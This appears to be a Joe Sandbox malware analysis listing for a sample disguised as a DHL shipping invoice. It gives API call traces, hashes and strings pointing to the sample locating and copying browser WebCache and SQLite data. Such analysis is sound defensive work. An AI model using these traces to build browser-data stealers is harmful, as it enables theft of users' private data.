                                                                                                                                                                                                                                      • String ID: "%s"
                                                                                                                                                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                      • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2911713577-0
                                                                                                                                                                                                                                      • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                      • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                                      • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmpqsort
                                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                                      • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                                      • API String ID: 2887208581-2114579845
                                                                                                                                                                                                                                      • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(023F0048), ref: 0044DF01
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02400050), ref: 0044DF11
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00B46E78), ref: 0044DF21
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02400458), ref: 0044DF31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                                      • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@DeleteObject
                                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                                      • API String ID: 1103273653-628097481
                                                                                                                                                                                                                                      • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$memcmp
                                                                                                                                                                                                                                      • String ID: $$8
                                                                                                                                                                                                                                      • API String ID: 2808797137-435121686
                                                                                                                                                                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                                                                                                      • too many columns on %s, xrefs: 00430763
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                                                                                                      • API String ID: 0-1445880494
                                                                                                                                                                                                                                      • Opcode ID: 93b9582cf047c94b57d064edc5564507e5ded9912264045a732c21487ec891bf
                                                                                                                                                                                                                                      • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93b9582cf047c94b57d064edc5564507e5ded9912264045a732c21487ec891bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,757C2EE0), ref: 0040E3EC
                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1979745280-0
                                                                                                                                                                                                                                      • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
